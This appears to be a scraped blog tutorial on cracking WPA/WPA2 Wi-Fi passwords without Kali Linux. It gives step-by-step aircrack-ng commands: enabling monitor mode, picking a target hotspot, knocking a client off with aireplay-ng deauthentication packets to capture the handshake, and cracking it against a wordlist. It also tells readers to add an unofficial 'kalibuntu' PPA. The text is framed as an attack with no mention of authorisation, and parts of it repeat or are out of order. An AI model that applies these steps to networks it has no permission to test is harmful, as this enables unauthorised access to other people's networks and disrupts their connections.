HOW TO HACK WI-FI WITH OUT KALI LINUX ?
On the terminal with airodump-ng running, a "WPA handshake" message should appear. The aireplay-ng terminal can be closed. Keep the four generate files that are placed in the selected directory and remember to write down the WPA handshake hexadecimal number.
Keep in mind that Kali Linux (formerly called "Backtrack") is not needed for hacking.
OBTAINING REQUIRED TOOLS:
To begin ,
- Install the needed packages. Some distros contain the needed tools in the default repos and others do not.
- If they are not in the Ubuntu repos,
- add the "ppa:darklordpaunik8880/kalibuntu" PPA by typing "apt-add-repository ppa:darklordpaunik8880/kalibuntu".
- Once the repos are add, then on Debian-based systems,
- Type "apt-get install aircrack-ng".(The "aircrack-ng" package adds many WiFi hacking tools and the package's dependencies provide additional utilities)
Attack:
- Open a terminal and type "airmon-ng".
- This will display a list of detected WiFi devices on the local system that support monitoring (this feature is needed).
- Then, type "airmon-ng start INTERFACE" where "INTERFACE" is the desired wireless device (such as "wlan0") that supports monitoring.
- The terminal should display a monitor interface name (such as "mon0").
NOTE: After running the last command, you should see “(monitor mode enabled)” in the output.
Waiting for a client to reconnect may take a while. Thankfully, this process can be sped up. In that same terminal output,
- Type "airodump-ng MONITOR-INTERFACE" (where "MONITOR-INTERFACE" is usually mon0).
- If a "fixed channel –1" error message is seen,
- then execute "ifconfig INTERFACE down" (such as wlan0) and retry the airodump-ng command. After the whole hacking process, remember to type "ifconfig INTERFACE up" to make the wireless card connect to the Internet as before.
- The airodump-ng command will return a list of detected Wifi hotspots.
- Look for one that uses WPA or WPA2 encryption (ENC), CCMP as the cipher, and PSK as the authentication method (AUTH).
- Once a hotspot has been selected, write down the ESSID, BSSID, and channel (CH).
- With the gathered information,
- type a command using the format "airodump-ng -w DIRECTORY -c CHANNEL --bssid BSSID MONITOR-INTERFACE".
- The chosen directory is used to store files containing the handshake authentication data used when a device connects to the WiFi. Now, when a client connects or reconnects to the Wifi, your system will watch how the authentication process occurs.
Waiting for a client to reconnect may take a while. Thankfully, this process can be sped up. In that same terminal output,
- look under the "Station" heading and look for a BSSID.
- Write down that BSSID which is the BSSID of a client connected to the selected WiFi.
- In a new terminal, type "aireplay-ng –0 2 –a WIFI-BSSID –c CLIENT-BSSID MONITOR-INTERFACE" using the gathered information.
- The "-0" parameter means deauth mode will be used and "2" deauth packets will be sent.
- This will trigger the router to reconnect/reauthenticate the chosen client. This is how the authentication process can be analyzed.
On the terminal with airodump-ng running, a "WPA handshake" message should appear. The aireplay-ng terminal can be closed. Keep the four generate files that are placed in the selected directory and remember to write down the WPA handshake hexadecimal number.
- Now, the collected data can be analyzed locally to crack the password.
- With the gathered data, type a command in the form "aircrack-ng -a2 -b WIFI-BSSID -w WORDLIST-PATH DIRECTORY/*.cap".
- Use "-a1" for WPA and "-a2" for WPA2. The directory is the same one chosen previously.
- The wordlist file is a plain-text file containing many possible passwords. Be sure to obtain a wordlist file.
If the process is successful, then the user will see a "KEY FOUND!" message and the message will display the password
DOWNLOAD wordlist from here
Everywhere Wireless Speed Test
ReplyDelete